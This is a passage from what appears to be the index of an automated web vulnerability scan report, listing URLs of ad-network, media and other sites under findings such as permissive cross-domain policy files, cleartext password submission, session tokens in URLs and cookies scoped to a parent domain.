5.99. http://rt1901.infolinks.com/crossdomain.xml

5.100. http://rt1903.infolinks.com/crossdomain.xml

5.101. http://s0.2mdn.net/crossdomain.xml

5.102. http://sana.newsinc.com/crossdomain.xml

5.103. http://segment-pixel.invitemedia.com/crossdomain.xml

5.104. http://sensor2.suitesmart.com/crossdomain.xml

5.105. http://servedby.flashtalking.com/crossdomain.xml

5.106. http://spe.atdmt.com/crossdomain.xml

5.107. http://static.scanscout.com/crossdomain.xml

5.108. http://stats.kaltura.com/crossdomain.xml

5.109. http://t.mookie1.com/crossdomain.xml

5.110. http://tags.bluekai.com/crossdomain.xml

5.111. http://thumbnails.infolinks.com/crossdomain.xml

5.112. http://traffic.outbrain.com/crossdomain.xml

5.113. http://trk.vindicosuite.com/crossdomain.xml

5.114. http://u-ads.adap.tv/crossdomain.xml

5.115. http://vads.adbrite.com/crossdomain.xml

5.116. http://vast.bp3845889.btrll.com/crossdomain.xml

5.117. http://w88.go.com/crossdomain.xml

5.118. http://wls.wireless.att.com/crossdomain.xml

5.119. http://www.kaltura.com/crossdomain.xml

5.120. http://a.abc.com/crossdomain.xml

5.121. http://abc.go.com/crossdomain.xml

5.122. http://adimages.go.com/crossdomain.xml

5.123. http://ads.adsonar.com/crossdomain.xml

5.124. http://ads.dotomi.com/crossdomain.xml

5.125. http://ads.tw.adsonar.com/crossdomain.xml

5.126. http://adsatt.abc.starwave.com/crossdomain.xml

5.127. http://bh.heraldinteractive.com/crossdomain.xml

5.128. http://bostonherald.com/crossdomain.xml

5.129. http://bostonheraldnie.newspaperdirect.com/crossdomain.xml

5.130. http://cache.heraldinteractive.com/crossdomain.xml

5.131. http://cdn.abc.go.com/crossdomain.xml

5.132. http://cdn.media.abc.com/crossdomain.xml

5.133. http://cdn.media.abc.go.com/crossdomain.xml

5.134. http://cdn.video.abc.com/crossdomain.xml

5.135. http://cim.meebo.com/crossdomain.xml

5.136. http://cookex.amp.yahoo.com/crossdomain.xml

5.137. http://images.search.yahoo.com/crossdomain.xml

5.138. http://mi.adinterax.com/crossdomain.xml

5.139. http://omg.yahoo.com/crossdomain.xml

5.140. http://qa.n7.vp2.abc.go.com/crossdomain.xml

5.141. http://rd.meebo.com/crossdomain.xml

5.142. http://search.yahoo.com/crossdomain.xml

5.143. http://site.abc.go.com/crossdomain.xml

5.144. http://syndication.mmismm.com/crossdomain.xml

5.145. http://us.adserver.yahoo.com/crossdomain.xml

5.146. http://vid.catalog.newsinc.com/crossdomain.xml

5.147. http://www.att.com/crossdomain.xml

5.148. http://www.bostonherald.com/crossdomain.xml

5.149. http://www.meebo.com/crossdomain.xml

5.150. http://www.tmz.com/crossdomain.xml

5.151. http://bigapple.contextuads.com/crossdomain.xml

5.152. http://bit.ly/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://2912a.v.fwmrm.net/clientaccesspolicy.xml

6.2. http://adm.fwmrm.net/clientaccesspolicy.xml

6.3. http://adunit.cdn.auditude.com/clientaccesspolicy.xml

6.4. http://b.voicefive.com/clientaccesspolicy.xml

6.5. http://cdn.kaltura.com/clientaccesspolicy.xml

6.6. http://cdnbakmi.kaltura.com/clientaccesspolicy.xml

6.7. http://clk.atdmt.com/clientaccesspolicy.xml

6.8. http://dp.33across.com/clientaccesspolicy.xml

6.9. http://metrics.tmz.com/clientaccesspolicy.xml

6.10. http://pixel.33across.com/clientaccesspolicy.xml

6.11. http://s0.2mdn.net/clientaccesspolicy.xml

6.12. http://spe.atdmt.com/clientaccesspolicy.xml

6.13. http://stats.kaltura.com/clientaccesspolicy.xml

6.14. http://trk.vindicosuite.com/clientaccesspolicy.xml

6.15. http://w88.go.com/clientaccesspolicy.xml

6.16. http://www.kaltura.com/clientaccesspolicy.xml

6.17. http://ts1.mm.bing.net/clientaccesspolicy.xml

6.18. http://ts2.mm.bing.net/clientaccesspolicy.xml

6.19. http://ts3.mm.bing.net/clientaccesspolicy.xml

6.20. http://ts4.mm.bing.net/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://dw1.s81c.com/common/js/dynamicnav.js

7.2. http://forums.cpanel.net/calendar.php

7.3. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html

7.4. http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html

7.5. http://www.actvalue.com/

7.6. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp

7.7. http://www.ibm.com/common/js/dynamicnav.js

7.8. http://www.ibm.com/developerworks/java/

7.9. http://www.ibm.com/developerworks/java/find/standards/

7.10. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html

7.11. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html

7.12. http://www.ibm.com/developerworks/tivoli/library/s-csscript/

7.13. http://www.ibm.com/developerworks/tivoli/library/s-csscript/

7.14. http://www.ibm.com/search/csass/search/

7.15. http://www.ted.com/js/library.min.js

7.16. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/

7.17. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/

7.18. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/

7.19. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/

7.20. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/

7.21. http://www.tmz.com/signin/

7.22. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/

7.23. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/

7.24. http://www.usenetbinaries.com/l/newsgroups.html

8. SQL statement in request parameter

9. SSL cookie without secure flag set

10. Session token in URL

10.1. http://arc.help.yahoo.com/error.gif

10.2. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard

10.3. http://omg.yahoo.com/

10.4. http://omg.yahoo.com/hot-topics

10.5. http://omg.yahoo.com/news/january-jones-welcomes-baby-boy-xander/72215

10.6. http://omg.yahoo.com/photos/what-were-they-thinking/5203

10.7. http://omg.yahoo.com/search

10.8. http://omg.yahoo.com/xhr/ad/LREC/2115806991

10.9. http://omg.yahoo.com/xhr/ad/LREC/2115823648

10.10. http://omg.yahoo.com/xhr/ad/LREC/2115823648

10.11. http://omg.yahoo.com/xhr/ad/MREC/2115823648

10.12. http://omg.yahoo.com/xhr/ad/MREC/2115823648

10.13. http://omg.yahoo.com/xhr/relatedsearch/

10.14. http://stats.kaltura.com//api_v3/index.php

10.15. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

10.16. http://www.facebook.com/extern/login_status.php

10.17. http://www.itoncommand.com/GetAQuote.aspx

10.18. http://www.matrix42.com/new-to-matrix42/

10.19. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp

11. Cookie scoped to parent domain

11.1. http://www.mailjet.com/

11.2. http://www.mailjet.com/pricing

11.3. https://www.mailjet.com/signup

11.4. http://27.xg4ken.com/media/redir.php

11.5. http://2912a.v.fwmrm.net/ad/l/1

11.6. http://2912a.v.fwmrm.net/ad/l/1

11.7. http://2912a.v.fwmrm.net/ad/l/1

11.8. http://2912a.v.fwmrm.net/ad/p/1

11.9. http://a.collective-media.net/adj/cm.rev_bostonherald/

11.10. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience

11.11. http://a.collective-media.net/adj/q1.bosherald/be_news

11.12. http://a.collective-media.net/adj/q1.bosherald/ent_fr

11.13. http://a.collective-media.net/adj/q1.bosherald/news

11.14. http://a.collective-media.net/cmadj/cm.rev_bostonherald/

11.15. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience

11.16. http://a.collective-media.net/cmadj/q1.bosherald/be_news

11.17. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr

11.18. http://a.collective-media.net/cmadj/q1.bosherald/news

11.19. http://a.tribalfusion.com/i.cid

11.20. http://a.tribalfusion.com/j.ad

11.21. http://a.tribalfusion.com/z/i.cid

11.22. http://ad.auditude.com/adserver

11.23. http://ad.auditude.com/adserver

11.24. http://ad.auditude.com/adserver

11.25. http://ad.auditude.com/adserver

11.26. http://ad.auditude.com/adserver

11.27. http://ad.auditude.com/adserver

11.28. http://ad.auditude.com/adserver

11.29. http://ad.auditude.com/adserver

11.30. http://ad.auditude.com/adserver

11.31. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.2

11.32. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.3

11.33. http://ad.doubleclick.net/adj/q1.bosherald/be_news

11.34. http://ad.doubleclick.net/adj/q1.bosherald/news

11.35. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_hookups

11.36. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_justice

11.37. http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/w%3B245892120%3B0-0%3B0%3B69485624%3B4986-300/600%3B43918246/43936033/1%3B%3B~okv%3D%3Bpc%3DDFP245079213%3B%3B~fdr%3D245079213%3B0-0%3B0%3B61866028%3B4986-300/600%3B44072410/44090197/1%3B%3B~sscs%3D%3fhttp://t.mookie1.com/t/v1/clk

11.38. http://ads.lucidmedia.com/clicksense/pixel

11.39. http://adserver.teracent.net/tase/ad

11.40. http://adserver.teracent.net/tase/redir/1316221519820_135153353_as3104_imp/vew

11.41. http://adserver.teracent.net/tase/redir/1316221548433_135109402_as3106_imp/vew

11.42. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php

11.43. http://apis.google.com/js/plusone.js

11.44. http://ar.voicefive.com/b/recruitBeacon.pli

11.45. http://ar.voicefive.com/b/wc_beacon.pli

11.46. http://ar.voicefive.com/bmx3/broker.pli

11.47. http://b.scorecardresearch.com/b

11.48. http://b.scorecardresearch.com/p

11.49. http://b.scorecardresearch.com/r

11.50. http://b.voicefive.com/b

11.51. http://b.voicefive.com/p

11.52. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2

11.53. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0

11.54. http://c.statcounter.com/t.php

11.55. http://cdnt.meteorsolutions.com/api/setid

11.56. http://cdnt.meteorsolutions.com/api/track

11.57. http://cdnt.meteorsolutions.com/api/track

11.58. http://clk.atdmt.com/go/335787632/direct

11.59. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js

11.60. http://d7.zedo.com/img/bh.gif

11.61. http://d7.zedo.com/utils/ecSet.js

11.62. http://g2.gumgum.com/services/get

11.63. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030885431/

11.64. http://i.w55c.net/a.gif

11.65. http://ib.adnxs.com/ptj

11.66. http://id.google.com/verify/EAAAACVdGxrtkWeq3ahmGHeybfM.gif

11.67. http://id.google.com/verify/EAAAADcsWXnWx7Yx9gMo-IqM7r8.gif

11.68. http://image2.pubmatic.com/AdServer/Pug

11.69. http://imp.fetchback.com/serve/fb/adtag.js

11.70. http://imp.fetchback.com/serve/fb/imp

11.71. http://leadback.advertising.com/adcedge/lb

11.72. http://leadback.advertising.com/adcedge/lb

11.73. http://loadm.exelator.com/load/

11.74. http://log.go.com/log

11.75. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Bottom

11.76. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle

11.77. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1

11.78. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top

11.79. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom

11.80. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle

11.81. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1

11.82. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top

11.83. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@x01!x01

11.84. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Bottom

11.85. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle

11.86. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top

11.87. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@x01!x01

11.88. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

11.89. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

11.90. http://odb.outbrain.com/utils/get

11.91. http://omg.yahoo.com/photos/what-were-they-thinking/5203

11.92. http://ping.crowdscience.com/ping.js

11.93. http://r.turn.com/r/beacon

11.94. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/

11.95. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653

11.96. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13141172/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome

11.97. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13161297/hr=1/hl=11/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CBottom%2526page%253Dbh.heraldinteractive.com%25252F%252Fyour_tax_dollars_at_work

11.98. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13485129/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle

11.99. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=14907432/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome

11.100. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=39615410/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome

11.101. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=4347768/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

11.102. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=71688841/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

11.103. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=73068085/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

11.104. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=87670031/hr=1/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

11.105. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=15131969/hr=1/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fregional%25252Farticle

11.106. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=36701179/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

11.107. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=3823857/hr=1/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fcolumnists%25252Farticle

11.108. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=4214348/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle

11.109. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=94471246/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

11.110. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=1532848/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome

11.111. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=19365718/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome

11.112. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=2205187/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

11.113. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=73177346/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome

11.114. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=4256658/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tmz.com%252F2011%252F09%252F16%252Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%252F%253Fadid%253Dhero1

11.115. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

11.116. http://r1-ads.ace.advertising.com/site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D

11.117. http://receive.inplay.tubemogul.com/StreamReceiver/services

11.118. http://rs.gwallet.com/r1/pixel/x420r2425801

11.119. http://rt.legolas-media.com/lgrt

11.120. http://rt1302.infolinks.com/action/doq.htm

11.121. http://rt1701.infolinks.com/action/doq.htm

11.122. http://rt1702.infolinks.com/action/doq.htm

11.123. http://rt1803.infolinks.com/action/doq.htm

11.124. http://rt1804.infolinks.com/action/doq.htm

11.125. http://rt1901.infolinks.com/action/doq.htm

11.126. http://rt1903.infolinks.com/action/doq.htm

11.127. http://sensor2.suitesmart.com/sensor4.js

11.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.129. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.130. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.131. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.132. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.133. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.134. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.135. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.136. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.137. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.138. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.139. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.140. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.141. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.142. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.143. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.144. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.145. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.146. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.147. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.148. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.149. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.150. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.151. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.152. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.153. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.154. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.155. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.156. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.157. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.158. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.159. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.160. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.161. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.162. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.163. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.164. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.165. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.166. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.167. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.168. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.169. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.170. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.171. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.172. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.173. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.174. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.175. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.176. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.177. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.178. http://tag.contextweb.com/TagPublish/GetAd.aspx

11.179. http://tag.contextweb.com/TagPublish/GetAd.aspx

11.180. http://tenzing.fmpub.net/

11.181. http://testdm.travelers.com/trvwics.gif

11.182. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FPhotoSlideShow%2FYAHOO_143_B2C_Mail_Expandable_954x60%2CC%3DMail%2CP%3DYahoo%2CK%3D3078101/0.9137649598997086/0/in%2Cti/ti.gif

11.183. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.21918878913857043/0/in%2Cti/ti.gif

11.184. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.3687601247802377/0/in%2Cti/ti.gif

11.185. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.558339134324342/0/in%2Cti/ti.gif

11.186. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.9227102545555681/0/in%2Cti/ti.gif

11.187. http://traffic.outbrain.com/network/redir

11.188. http://u-ads.adap.tv/a/h/HuqeLZgU_XaX8g16tMn8bSkO7yiAt1QCn5DKEyqYSJq69nbfVmH21Q==

